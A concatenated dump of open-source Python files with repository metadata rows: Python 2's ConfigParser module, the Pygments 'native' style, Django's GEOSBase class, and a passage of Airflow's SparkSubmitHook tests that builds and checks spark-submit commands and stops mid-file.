insensitively defined as 0, false, no, off for False, and 1, true,
yes, on for True). Returns False or True.
items(section, raw=False, vars=None)
return a list of tuples with (name, value) for each option
in the section.
remove_section(section)
remove the given file section and all its options
remove_option(section, option)
remove the given option from the given section
set(section, option, value)
set the given option
write(fp)
write the configuration state in .ini format
"""
try:
from collections import OrderedDict as _default_dict
except ImportError:
# fallback for setup.py which hasn't yet built _collections
_default_dict = dict
import re
__all__ = ["NoSectionError", "DuplicateSectionError", "NoOptionError",
"InterpolationError", "InterpolationDepthError",
"InterpolationSyntaxError", "ParsingError",
"MissingSectionHeaderError",
"ConfigParser", "SafeConfigParser", "RawConfigParser",
"DEFAULTSECT", "MAX_INTERPOLATION_DEPTH"]
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
# exception classes
class Error(Exception):
"""Base class for ConfigParser exceptions."""
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation in
BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation in
BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6. To prevent
# DeprecationWarning from popping up over this pre-existing attribute, use
# a new property that takes lookup precedence.
message = property(_get_message, _set_message)
def __init__(self, msg=''):
self.message = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.message
__str__ = __repr__
class NoSectionError(Error):
"""Raised when no section matches a requested option."""
def __init__(self, section):
Error.__init__(self, 'No section: %r' % (section,))
self.section = section
self.args = (section, )
class DuplicateSectionError(Error):
"""Raised when a section is multiply-created."""
def __init__(self, section):
Error.__init__(self, "Section %r already exists" % section)
self.section = section
self.args = (section, )
class NoOptionError(Error):
"""A requested option was not found."""
def __init__(self, option, section):
Error.__init__(self, "No option %r in section: %r" %
(option, section))
self.option = option
self.section = section
self.args = (option, section)
class InterpolationError(Error):
"""Base class for interpolation-related exceptions."""
def __init__(self, option, section, msg):
Error.__init__(self, msg)
self.option = option
self.section = section
self.args = (option, section, msg)
class InterpolationMissingOptionError(InterpolationError):
"""A string substitution required a setting which was not available."""
def __init__(self, option, section, rawval, reference):
msg = ("Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
InterpolationError.__init__(self, option, section, msg)
self.reference = reference
self.args = (option, section, rawval, reference)
class InterpolationSyntaxError(InterpolationError):
"""Raised when the source text into which substitutions are made
does not conform to the required syntax."""
class InterpolationDepthError(InterpolationError):
"""Raised when substitutions are nested too deeply."""
def __init__(self, option, section, rawval):
msg = ("Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
InterpolationError.__init__(self, option, section, msg)
self.args = (option, section, rawval)
class ParsingError(Error):
"""Raised when a configuration file does not follow legal syntax."""
def __init__(self, filename):
Error.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
self.args = (filename, )
def append(self, lineno, line):
self.errors.append((lineno, line))
self.message += '\n\t[line %2d]: %s' % (lineno, line)
class MissingSectionHeaderError(ParsingError):
"""Raised when a key-value pair is found before any section header."""
def __init__(self, filename, lineno, line):
Error.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%r' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
self.args = (filename, lineno, line)
class RawConfigParser:
def __init__(self, defaults=None, dict_type=_default_dict,
allow_no_value=False):
self._dict = dict_type
self._sections = self._dict()
self._defaults = self._dict()
if allow_no_value:
self._optcre = self.OPTCRE_NV
else:
self._optcre = self.OPTCRE
if defaults:
for key, value in defaults.items():
self._defaults[self.optionxform(key)] = value
def defaults(self):
return self._defaults
def sections(self):
"""Return a list of section names, excluding [DEFAULT]"""
# self._sections will never have [DEFAULT] in it
return self._sections.keys()
def add_section(self, section):
"""Create a new section in the configuration.
Raise DuplicateSectionError if a section by the specified name
        already exists. Raise ValueError if name is DEFAULT or any of its
case-insensitive variants.
"""
if section.lower() == "default":
raise ValueError, 'Invalid section name: %s' % section
if section in self._sections:
raise DuplicateSectionError(section)
self._sections[section] = self._dict()
def has_section(self, section):
"""Indicate whether the named section is present in the configuration.
The DEFAULT section is not acknowledged.
"""
return section in self._sections
def options(self, section):
"""Return a list of option names for the given section name."""
try:
opts = self._sections[section].copy()
except KeyError:
raise NoSectionError(section)
opts.update(self._defaults)
if '__name__' in opts:
del opts['__name__']
return opts.keys()
def read(self, filenames):
"""Read and parse a filename or a list of filenames.
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
Return list of successfully read files.
"""
if isinstance(filenames, basestring):
filenames = [filenames]
read_ok = []
for filename in filenames:
try:
fp = open(filename)
except IOError:
continue
self._read(fp, filename)
fp.close()
read_ok.append(filename)
return read_ok
def readfp(self, fp, filename=None):
"""Like read() but the argument must be a file-like object.
The `fp' argument must have a `readline' method. Optional
second argument is the `filename', which if not given, is
taken from fp.name. If fp has no `name' attribute, `<???>' is
used.
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self._read(fp, filename)
def get(self, section, option):
opt = self.optionxform(option)
if section not in self._sections:
if section != DEFAULTSECT:
raise NoSectionError(section)
if opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
elif opt in self._sections[section]:
return self._sections[section][opt]
elif opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
def items(self, section):
try:
d2 = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
d2 = self._dict()
d = self._defaults.copy()
d.update(d2)
if "__name__" in d:
del d["__name__"]
return d.items()
def _get(self, section, conv, option):
return conv(self.get(section, option))
def getint(self, section, option):
return self._get(section, int, option)
def getfloat(self, section, option):
return self._get(section, float, option)
_boolean_states = {'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False}
def getboolean(self, section, option):
v = self.get(section, option)
if v.lower() not in self._boolean_states:
raise ValueError, 'Not a boolean: %s' % v
return self._boolean_states[v.lower()]
def optionxform(self, optionstr):
return optionstr.lower()
def has_option(self, section, option):
"""Check for the existence of a given option in a given section."""
if not section or section == DEFAULTSECT:
option = self.optionxform(option)
return option in self._defaults
elif section not in self._sections:
return False
else:
option = self.optionxform(option)
return (option in self._sections[section]
or option in self._defaults)
def set(self, section, option, value=None):
"""Set an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
sectdict[self.optionxform(option)] = value
def write(self, fp):
"""Write an .ini-format representation of the configuration state."""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, str(value).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key == "__name__":
continue
if (value is not None) or (self._optcre == self.OPTCRE):
key = " = ".join((key, str(value).replace('\n', '\n\t')))
fp.write("%s\n" % (key))
fp.write("\n")
def remove_option(self, section, option):
"""Remove an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
option = self.optionxform(option)
existed = option in sectdict
if existed:
del sectdict[option]
return existed
def remove_section(self, section):
"""Remove a file section."""
existed = section in self._sections
if existed:
del self._sections[section]
return existed
#
# Regular expressions for parsing section headers and options.
#
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?P<vi>[:=])\s*' # any number of space/tab,
# followed by separator
# (either : or =), followed
        # by any space/tab
r'(?P<value>.*)$' # everything up to eol
)
OPTCRE_NV = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?:' # any number of space/tab,
r'(?P<vi>[:=])\s*' # optionally followed by
# separator (either : or
        # =), followed by any
# space/tab
r'(?P<value>.*))?$' # everything up to eol
)
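    # Illustrative matches (an addition):
    #   OPTCRE matches    "name: value" -> option='name', vi=':', value='value'
    #   OPTCRE_NV matches "name"        -> option='name', vi=None, value=None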
def _read(self, fp, fpname):
"""Parse a sectioned setup file.
        The sections in a setup file contain a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
options lines, indicated by `name: value' format lines.
Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else are ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while True:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# continuation line?
if line[0].isspace() and cursect is not None and optname:
value = line.strip()
if value:
cursect[optname].append(value)
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == DEFAULTSECT:
cursect = self._defaults
else:
cursect = self._dict()
cursect['__name__'] = sectname
self._sections[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, line)
# an option line?
else:
mo = self._optcre.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
optname = self.optionxform(optname.rstrip())
# This check is fine because the OPTCRE cannot
# match if it would set optval to None
if optval is not None:
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos != -1 and optval[pos-1].isspace():
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
cursect[optname] = [optval]
else:
# valueless option handling
cursect[optname] = optval
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, repr(line))
# if any parsing errors occurred, raise an exception
if e:
raise e
# join the multi-line values collected while reading
all_sections = [self._defaults]
all_sections.extend(self._sections.values())
for options in all_sections:
for name, val in options.items():
if isinstance(val, list):
options[name] = '\n'.join(val)
import UserDict as _UserDict
class _Chainmap(_UserDict.DictMixin):
"""Combine multiple mappings for successive lookups.
For example, to emulate Python's normal lookup sequence:
import __builtin__
pylookup = _Chainmap(locals(), globals(), vars(__builtin__))
"""
def __init__(self, *maps):
self._maps = maps
def __getitem__(self, key):
for mapping in self._maps:
try:
return mapping[key]
except KeyError:
pass
raise KeyError(key)
def keys(self):
result = []
seen = set()
for mapping in self._maps:
for key in mapping:
if key not in seen:
result.append(key)
seen.add(key)
return result
class ConfigParser(RawConfigParser):
def get(self, section, option, raw=False, vars=None):
"""Get an option value for a given section.
If `vars' is provided, it must be a dictionary. The option is looked up
in `vars' (if provided), `section', and in `defaults' in that order.
All % interpolations are expanded in the return values, unless the
optional argument `raw' is true. Values for interpolation keys are
looked up in the same manner as the option.
The section DEFAULT is special.
"""
sectiondict = {}
try:
sectiondict = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
vardict = {}
if vars:
for key, value in vars.items():
vardict[self.optionxform(key)] = value
d = _Chainmap(vardict, sectiondict, self._defaults)
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
raise NoOptionError(option, section)
if raw or value is None:
return value
else:
return self._interpolate(section, option, value, d)
def items(self, section, raw=False, vars=None):
"""Return a list of tuples with (name, value) for each option
in the section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
        `vars' argument, which must be a dictionary whose contents override
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
options = d.keys()
if "__name__" in options:
options.remove("__name__")
if raw:
return [(option, d[option])
for option in options]
else:
return [(option, self._interpolate(section, option, d[option], d))
for option in options]
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
value = rawval
depth = MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if value and "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
raise InterpolationMissingOptionError(
option, section, rawval, e.args[0])
else:
break
if value and "%(" in value:
raise InterpolationDepthError(option, section, rawval)
return value
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % self.optionxform(s)
class SafeConfigParser(ConfigParser):
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
L = []
self._interpolate_some(option, L, rawval, section, vars, 1)
return ''.join(L)
_interpvar_re = re.compile(r"%\(([^)]+)\)s")
def _interpolate_some(self, option, accum, rest, section, map, depth):
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rest)
while rest:
p = rest.find("%")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
if c == "%":
accum.append("%")
rest = rest[2:]
elif c == "(":
m = self._interpvar_re.match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
var = self.optionxform(m.group(1))
rest = rest[m.end():]
try:
v = map[var]
except KeyError:
raise InterpolationMissingOptionError(
option, section, rest, var)
if "%" in v:
self._interpolate_some(option, accum, v,
section, map, depth + 1)
else:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'%%' must be followed by '%%' or '(', found: %r" % (rest,))
def set(self, section, option, value=None):
"""Set an option. Extend ConfigParser.set: check for string values."""
# The only legal non-string value if we allow valueless
# options is None, so we need to check if the value is a
# string if:
# - we do not allow valueless options, or
# - we allow valueless options but the value is not None
if self._optcre is self.OPTCRE or value:
if not isinstance(value, basestring):
raise TypeError("option values must be strings")
if value is not None:
# check for bad percent signs:
# first, replace all "good" interpolations
tmp_value = value.replace('%%', '')
tmp_value = self._interpvar_re.sub('', tmp_value)
# then, check if there's a lone percent sign left
if '%' in tmp_value:
raise ValueError("invalid interpolation syntax in %r at "
"position %d" % (value, tmp_value.find('%')))
ConfigParser.set(self, section, option, value)
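# Hedged usage sketch (an addition, not part of the stdlib module): shows
# %(...)s interpolation being resolved on read.
def _usage_sketch():
    cp = SafeConfigParser()
    cp.add_section('paths')
    cp.set('paths', 'dir', '/srv/data')
    cp.set('paths', 'log', '%(dir)s/app.log')
    return cp.get('paths', 'log')   # -> '/srv/data/app.log'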
| mit |
timonwong/OmniMarkupPreviewer | OmniMarkupLib/Renderers/libs/pygments/styles/native.py | 135 | 1938 | # -*- coding: utf-8 -*-
"""
pygments.styles.native
~~~~~~~~~~~~~~~~~~~~~~
pygments version of my "native" vim theme.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Token, Whitespace
class NativeStyle(Style):
"""
Pygments version of the "native" vim theme.
"""
background_color = '#202020'
highlight_color = '#404040'
styles = {
Token: '#d0d0d0',
Whitespace: '#666666',
Comment: 'italic #999999',
Comment.Preproc: 'noitalic bold #cd2828',
Comment.Special: 'noitalic bold #e50808 bg:#520000',
Keyword: 'bold #6ab825',
Keyword.Pseudo: 'nobold',
Operator.Word: 'bold #6ab825',
String: '#ed9d13',
String.Other: '#ffa500',
Number: '#3677a9',
Name.Builtin: '#24909d',
Name.Variable: '#40ffff',
Name.Constant: '#40ffff',
Name.Class: 'underline #447fcf',
Name.Function: '#447fcf',
Name.Namespace: 'underline #447fcf',
Name.Exception: '#bbbbbb',
Name.Tag: 'bold #6ab825',
Name.Attribute: '#bbbbbb',
Name.Decorator: '#ffa500',
Generic.Heading: 'bold #ffffff',
Generic.Subheading: 'underline #ffffff',
Generic.Deleted: '#d22323',
Generic.Inserted: '#589819',
Generic.Error: '#d22323',
Generic.Emph: 'italic',
Generic.Strong: 'bold',
Generic.Prompt: '#aaaaaa',
Generic.Output: '#cccccc',
Generic.Traceback: '#d22323',
Error: 'bg:#e3d2d2 #a61717'
}
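# Hedged usage sketch (an addition): the style plugs into the standard
# pygments pipeline like any other Style subclass, e.g.:
#
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   from pygments.formatters import HtmlFormatter
#   html = highlight('print(42)', PythonLexer(),
#                    HtmlFormatter(style=NativeStyle))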
| mit |
samdowd/drumm-farm | drumm_env/lib/python2.7/site-packages/django/contrib/gis/geos/base.py | 437 | 1280 | from ctypes import c_void_p
from django.contrib.gis.geos.error import GEOSException
class GEOSBase(object):
"""
Base object for GEOS objects that has a pointer access property
that controls access to the underlying C pointer.
"""
# Initially the pointer is NULL.
_ptr = None
# Default allowed pointer type.
ptr_type = c_void_p
# Pointer access property.
def _get_ptr(self):
        # Raise an exception if the pointer isn't valid -- we don't
        # want to be passing NULL pointers to routines, as
        # that's very bad.
if self._ptr:
return self._ptr
else:
raise GEOSException('NULL GEOS %s pointer encountered.' % self.__class__.__name__)
def _set_ptr(self, ptr):
# Only allow the pointer to be set with pointers of the
# compatible type or None (NULL).
if ptr is None or isinstance(ptr, self.ptr_type):
self._ptr = ptr
else:
raise TypeError('Incompatible pointer type')
# Property for controlling access to the GEOS object pointers. Using
# this raises an exception when the pointer is NULL, thus preventing
# the C library from attempting to access an invalid memory location.
ptr = property(_get_ptr, _set_ptr)
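# Hedged sketch (an addition): a subclass is expected to narrow ptr_type and
# then go through self.ptr, getting the NULL check for free. GEOM_PTR and
# capi here are hypothetical stand-ins for the real ctypes bindings.
#
#   class Geometry(GEOSBase):
#       ptr_type = GEOM_PTR            # a ctypes pointer type in real code
#       def __init__(self, ptr):
#           self.ptr = ptr             # validated by _set_ptr
#       def area(self):
#           return capi.geos_area(self.ptr)  # raises GEOSException if NULL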
| mit |
nathanielvarona/airflow | tests/providers/apache/spark/hooks/test_spark_submit.py | 3 | 33603 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import os
import unittest
from unittest.mock import call, patch
import pytest
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.models import Connection
from airflow.providers.apache.spark.hooks.spark_submit import SparkSubmitHook
from airflow.utils import db
class TestSparkSubmitHook(unittest.TestCase):
_spark_job_file = 'test_application.py'
_config = {
'conf': {'parquet.compression': 'SNAPPY'},
'conn_id': 'default_spark',
'files': 'hive-site.xml',
'py_files': 'sample_library.py',
'archives': 'sample_archive.zip#SAMPLE',
'jars': 'parquet.jar',
'packages': 'com.databricks:spark-avro_2.11:3.2.0',
'exclude_packages': 'org.bad.dependency:1.0.0',
'repositories': 'http://myrepo.org',
'total_executor_cores': 4,
'executor_cores': 4,
'executor_memory': '22g',
'keytab': 'privileged_user.keytab',
'principal': 'user/spark@airflow.org',
'proxy_user': 'sample_user',
'name': 'spark-job',
'num_executors': 10,
'verbose': True,
'driver_memory': '3g',
'java_class': 'com.foo.bar.AppMain',
'application_args': [
'-f',
'foo',
'--bar',
'bar',
'--with-spaces',
'args should keep embedded spaces',
'baz',
],
}
@staticmethod
def cmd_args_to_dict(list_cmd):
return_dict = {}
for arg in list_cmd:
if arg.startswith("--"):
pos = list_cmd.index(arg)
return_dict[arg] = list_cmd[pos + 1]
return return_dict
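    # Illustrative example (an addition):
    #   cmd_args_to_dict(['--master', 'yarn', '--queue', 'root.etl'])
    #   -> {'--master': 'yarn', '--queue': 'root.etl'}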
def setUp(self):
db.merge_conn(
Connection(
conn_id='spark_yarn_cluster',
conn_type='spark',
host='yarn://yarn-master',
extra='{"queue": "root.etl", "deploy-mode": "cluster"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_k8s_cluster',
conn_type='spark',
host='k8s://https://k8s-master',
extra='{"spark-home": "/opt/spark", '
+ '"deploy-mode": "cluster", '
+ '"namespace": "mynamespace"}',
)
)
db.merge_conn(
Connection(conn_id='spark_default_mesos', conn_type='spark', host='mesos://host', port=5050)
)
db.merge_conn(
Connection(
conn_id='spark_home_set',
conn_type='spark',
host='yarn://yarn-master',
extra='{"spark-home": "/opt/myspark"}',
)
)
db.merge_conn(Connection(conn_id='spark_home_not_set', conn_type='spark', host='yarn://yarn-master'))
db.merge_conn(
Connection(
conn_id='spark_binary_set',
conn_type='spark',
host='yarn',
extra='{"spark-binary": "custom-spark-submit"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_binary_and_home_set',
conn_type='spark',
host='yarn',
extra='{"spark-home": "/path/to/spark_home", ' + '"spark-binary": "custom-spark-submit"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_standalone_cluster',
conn_type='spark',
host='spark://spark-standalone-master:6066',
extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "cluster"}',
)
)
db.merge_conn(
Connection(
conn_id='spark_standalone_cluster_client_mode',
conn_type='spark',
host='spark://spark-standalone-master:6066',
extra='{"spark-home": "/path/to/spark_home", "deploy-mode": "client"}',
)
)
def test_build_spark_submit_command(self):
# Given
hook = SparkSubmitHook(**self._config)
# When
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
expected_build_cmd = [
'spark-submit',
'--master',
'yarn',
'--conf',
'parquet.compression=SNAPPY',
'--files',
'hive-site.xml',
'--py-files',
'sample_library.py',
'--archives',
'sample_archive.zip#SAMPLE',
'--jars',
'parquet.jar',
'--packages',
'com.databricks:spark-avro_2.11:3.2.0',
'--exclude-packages',
'org.bad.dependency:1.0.0',
'--repositories',
'http://myrepo.org',
'--num-executors',
'10',
'--total-executor-cores',
'4',
'--executor-cores',
'4',
'--executor-memory',
'22g',
'--driver-memory',
'3g',
'--keytab',
'privileged_user.keytab',
'--principal',
'user/spark@airflow.org',
'--proxy-user',
'sample_user',
'--name',
'spark-job',
'--class',
'com.foo.bar.AppMain',
'--verbose',
'test_application.py',
'-f',
'foo',
'--bar',
'bar',
'--with-spaces',
'args should keep embedded spaces',
'baz',
]
assert expected_build_cmd == cmd
def test_build_track_driver_status_command(self):
# note this function is only relevant for spark setup matching below condition
# 'spark://' in self._connection['master'] and self._connection['deploy_mode'] == 'cluster'
# Given
hook_spark_standalone_cluster = SparkSubmitHook(conn_id='spark_standalone_cluster')
hook_spark_standalone_cluster._driver_id = 'driver-20171128111416-0001'
hook_spark_yarn_cluster = SparkSubmitHook(conn_id='spark_yarn_cluster')
hook_spark_yarn_cluster._driver_id = 'driver-20171128111417-0001'
# When
build_track_driver_status_spark_standalone_cluster = (
hook_spark_standalone_cluster._build_track_driver_status_command()
)
build_track_driver_status_spark_yarn_cluster = (
hook_spark_yarn_cluster._build_track_driver_status_command()
)
# Then
expected_spark_standalone_cluster = [
'/usr/bin/curl',
'--max-time',
'30',
'http://spark-standalone-master:6066/v1/submissions/status/driver-20171128111416-0001',
]
expected_spark_yarn_cluster = [
'spark-submit',
'--master',
'yarn://yarn-master',
'--status',
'driver-20171128111417-0001',
]
assert expected_spark_standalone_cluster == build_track_driver_status_spark_standalone_cluster
assert expected_spark_yarn_cluster == build_track_driver_status_spark_yarn_cluster
@patch('airflow.providers.apache.spark.hooks.spark_submit.subprocess.Popen')
def test_spark_process_runcmd(self, mock_popen):
# Given
mock_popen.return_value.stdout = io.StringIO('stdout')
mock_popen.return_value.stderr = io.StringIO('stderr')
mock_popen.return_value.wait.return_value = 0
# When
hook = SparkSubmitHook(conn_id='')
hook.submit()
# Then
assert mock_popen.mock_calls[0] == call(
['spark-submit', '--master', 'yarn', '--name', 'default-name', ''],
stderr=-2,
stdout=-1,
universal_newlines=True,
bufsize=-1,
)
def test_resolve_should_track_driver_status(self):
# Given
hook_default = SparkSubmitHook(conn_id='')
hook_spark_yarn_cluster = SparkSubmitHook(conn_id='spark_yarn_cluster')
hook_spark_k8s_cluster = SparkSubmitHook(conn_id='spark_k8s_cluster')
hook_spark_default_mesos = SparkSubmitHook(conn_id='spark_default_mesos')
hook_spark_home_set = SparkSubmitHook(conn_id='spark_home_set')
hook_spark_home_not_set = SparkSubmitHook(conn_id='spark_home_not_set')
hook_spark_binary_set = SparkSubmitHook(conn_id='spark_binary_set')
hook_spark_binary_and_home_set = SparkSubmitHook(conn_id='spark_binary_and_home_set')
hook_spark_standalone_cluster = SparkSubmitHook(conn_id='spark_standalone_cluster')
# When
should_track_driver_status_default = hook_default._resolve_should_track_driver_status()
should_track_driver_status_spark_yarn_cluster = (
hook_spark_yarn_cluster._resolve_should_track_driver_status()
)
should_track_driver_status_spark_k8s_cluster = (
hook_spark_k8s_cluster._resolve_should_track_driver_status()
)
should_track_driver_status_spark_default_mesos = (
hook_spark_default_mesos._resolve_should_track_driver_status()
)
should_track_driver_status_spark_home_set = hook_spark_home_set._resolve_should_track_driver_status()
should_track_driver_status_spark_home_not_set = (
hook_spark_home_not_set._resolve_should_track_driver_status()
)
should_track_driver_status_spark_binary_set = (
hook_spark_binary_set._resolve_should_track_driver_status()
)
should_track_driver_status_spark_binary_and_home_set = (
hook_spark_binary_and_home_set._resolve_should_track_driver_status()
)
should_track_driver_status_spark_standalone_cluster = (
hook_spark_standalone_cluster._resolve_should_track_driver_status()
)
# Then
assert should_track_driver_status_default is False
assert should_track_driver_status_spark_yarn_cluster is False
assert should_track_driver_status_spark_k8s_cluster is False
assert should_track_driver_status_spark_default_mesos is False
assert should_track_driver_status_spark_home_set is False
assert should_track_driver_status_spark_home_not_set is False
assert should_track_driver_status_spark_binary_set is False
assert should_track_driver_status_spark_binary_and_home_set is False
assert should_track_driver_status_spark_standalone_cluster is True
def test_resolve_connection_yarn_default(self):
# Given
hook = SparkSubmitHook(conn_id='')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "yarn",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "yarn"
def test_resolve_connection_yarn_default_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_default')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "yarn",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": "root.default",
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "yarn"
assert dict_cmd["--queue"] == "root.default"
def test_resolve_connection_mesos_default_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_default_mesos')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "mesos://host:5050",
"spark_binary": "spark-submit",
"deploy_mode": None,
"queue": None,
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "mesos://host:5050"
def test_resolve_connection_spark_yarn_cluster_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_yarn_cluster')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"master": "yarn://yarn-master",
"spark_binary": "spark-submit",
"deploy_mode": "cluster",
"queue": "root.etl",
"spark_home": None,
"namespace": None,
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "yarn://yarn-master"
assert dict_cmd["--queue"] == "root.etl"
assert dict_cmd["--deploy-mode"] == "cluster"
def test_resolve_connection_spark_k8s_cluster_connection(self):
# Given
hook = SparkSubmitHook(conn_id='spark_k8s_cluster')
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"spark_home": "/opt/spark",
"queue": None,
"spark_binary": "spark-submit",
"master": "k8s://https://k8s-master",
"deploy_mode": "cluster",
"namespace": "mynamespace",
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "k8s://https://k8s-master"
assert dict_cmd["--deploy-mode"] == "cluster"
def test_resolve_connection_spark_k8s_cluster_ns_conf(self):
# Given we specify the config option directly
conf = {
'spark.kubernetes.namespace': 'airflow',
}
hook = SparkSubmitHook(conn_id='spark_k8s_cluster', conf=conf)
# When
connection = hook._resolve_connection()
cmd = hook._build_spark_submit_command(self._spark_job_file)
# Then
dict_cmd = self.cmd_args_to_dict(cmd)
expected_spark_connection = {
"spark_home": "/opt/spark",
"queue": None,
"spark_binary": "spark-submit",
"master": "k8s://https://k8s-master",
"deploy_mode": "cluster",
"namespace": "airflow",
}
assert connection == expected_spark_connection
assert dict_cmd["--master"] == "k8s://https://k8s-master"
assert dict_cmd["--deploy-mode"] == "cluster"
assert dict_cmd["--conf"] == "spark.kubernetes.namespace=airflow"
def test_resolve_connection_spark_home_set_connection(self):
# Given
